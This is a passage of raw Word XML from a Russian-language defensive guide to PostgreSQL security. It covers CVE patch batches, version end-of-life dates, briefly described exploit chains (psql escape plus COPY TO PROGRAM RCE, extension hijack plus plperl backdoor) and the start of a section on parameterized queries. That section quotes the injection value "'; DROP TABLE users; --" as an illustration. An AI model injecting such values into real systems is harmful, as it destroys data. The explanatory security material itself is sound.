        <w:t xml:space="preserve"> (17.1, 16.5, 15.9, 14.14, 13.17, 12.21) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">четыре CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: R7 (plperl RCE), R8 (SET ROLE reset), R9 (RLS subquery), R10 (libpq MITM). Покрыли RCE + auth + RLS + libpq одним днём. Любая legacy minor до этой даты уязвима по четырём фронтам сразу.</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13.02.2025</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (17.3, 16.7, 15.11, 14.16, 13.19) — R6 (psql UTF-8 injection, CVSS 8.1) + R21 (chain с COPY TO PROGRAM RCE). Самый severe CVE 2025 года.</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14.08.2025</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (17.6, 16.10, 15.14, 14.19, 13.22) — R25 (pg_dump newline) + R26 (optimizer stats RLS bypass). Закрыл два независимых вектора в одном batch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">EOL milestones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12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — EOL 14.11.2024. Финальный минор-фикс — 12.21 (батч 14.11.2024 с CVE-2024-10976...10979). Кластеры на PG 12 после этой даты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не получают security patches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13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — EOL 13.11.2025. Финальный минор-фикс — 13.23 (батч 13.11.2025 с CVE-2025-12817).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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — EOL ожидается 12.11.2026. Кластеры стоит мигрировать на 16+ до этой даты.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PostgreSQL 11 / 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — EOL 09.11.2023 и 10.11.2022 соответственно. На сегодня (2026-05-26) уже год+ без патчей; не использовать в production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для legacy-кластеров на EOL major: все CVE, опубликованные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">после</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> EOL даты, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">навсегда открыты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — никакого backport-патчинга нет. См. 4.6 master-таблицу для актуального state по каждой major-ветке.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цепочки эксплуатации — приоритет patch-ов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3 цепочки из 4.7 показывают, что некоторые CVE приобретают critical severity только в chain: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R6 → R21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — psql escape bug + COPY TO PROGRAM = RCE на клиенте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R8 + R9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SET ROLE reset + RLS subquery в одном patch-окне = cross-tenant leak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R16 → R7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — extension hijack + plperl env = permanent backdoor (даже после R16 patch на уже-подменённых объектах)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для defenders это означает: priority-list patches должен учитывать chains, не только standalone CVSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Перекрёстные ссылки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6.2 Таблица всех CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — те же 28 R в табличном lookup-формате (по CVE-ID и R#). Раздел 4 — для чтения подряд, 6.2 — для быстрого поиска.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 Защита</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общие mitigations (параметризация, привилегии, расширения, конфиги, логирование). Раздел 4 — что закрыто patch-ами; раздел 5 — что остаётся в коде даже после всех patch-ов.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3.X.N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — полные карточки для CVE с категорийным якорем. Раздел 4 ссылается, не дублирует.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Использованные источники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R1–R28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sources/research.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (карточки + версионные сводки минор-релизов).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Security Advisories</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — основной источник CVE-данных, дат фиксов, CVSS.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Rapid7 disclosure CVE-2025-1094</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — chain-analysis с BeyondTrust PRA/RS.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IBM Security Bulletins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — multi-CVE coverage с focus на enterprise impact.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Cyber Security News</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — pgAdmin CVE-2025-13780 coverage.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Red Hat Bugzilla 2247168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — точные затрагиваемые функции для CVE-2023-5868.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GBHackers article</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обзор августовских CVE 2025 (R25, R26).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release notes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — даты минор-релизов и список CVE в каждом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что НЕ вошло в раздел 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Zero-day / unreported уязвимости</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — по определению не отслеживаются в публичном CVE registry; раздел 4 ограничен disclosed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CVE-2018-1058</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array_to_string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> trojan в public schema) — pre-2022, поэтому вне scope раздела 4. Упомянуто как контекст в 2.4 (search_path) и 3.13.4 (как мотивация для R16).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CVE-2019-9193</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (COPY FROM PROGRAM) — официально disputed by PostgreSQL community; community-позиция: «это feature, не CVE». Обсуждается в 3.7.1 как R3.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CVE-2024-24213</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Supabase </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/pg_meta/default/query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — vendor-disputed; административный endpoint, доступ к которому уже подразумевает execute-права. Не SQL-injection-сигнатура.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Драйверные CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (psycopg, pgjdbc, asyncpg, pgx, node-postgres) — вне scope, см. driver-specific CVE registries (PyPI, Maven Central security, etc.). Раздел 3.5 обсуждает driver behavior, но не driver-level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CVE-2023-5870</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DoS через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_signal_backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — нет в R1–R28; упомянут IBM bulletin вместе с R10 / R6 / R27, но не вошёл в research scope.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Параметризованные запросы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Главный mitigation для большинства категорий 3.X. Принцип: пользовательское значение никогда не попадает в SQL-текст — оно идёт отдельным Bind-параметром по wire-protocol, и сервер парсит SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> знания о значении. На стадии Parse сервер видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE name = $1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; Bind присоединяет значение, не интерпретируя его как SQL-токены.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Базовый механизм: extended query protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL wire-protocol определяет два режима (детально в 2.1):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Simple query (`'Q'`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: одно сообщение — клиент посылает строку SQL. Сервер парсит её как последовательность statement-ов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Значения, склеенные в строку через f-string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неотличимы от SQL-токенов.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Extended query (`Parse`/`Bind`/`Execute`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: три сообщения. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> отправляет шаблон SQL с placeholder-ами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$2</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Bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> отправляет значения как отдельные байтовые поля;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запускает. Значения проходят через type-coercion, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не парсятся как SQL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значения остаются простыми байтами.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На extended-уровне injection структурно невозможна: даже если в значение попадает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'; DROP TABLE users; --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, сервер интерпретирует это как длинную строку. Защищает не «экранирование», а отсутствие самой возможности интерпретации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Где параметризация ДЕЙСТВИТЕЛЬНО защищает</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Параметризация работает для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">значений</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в местах, где SQL-грамматика ожидает literal — фактически в любом месте, где можно написать строковую или числовую константу:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE col = $1                            -- value comparison</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
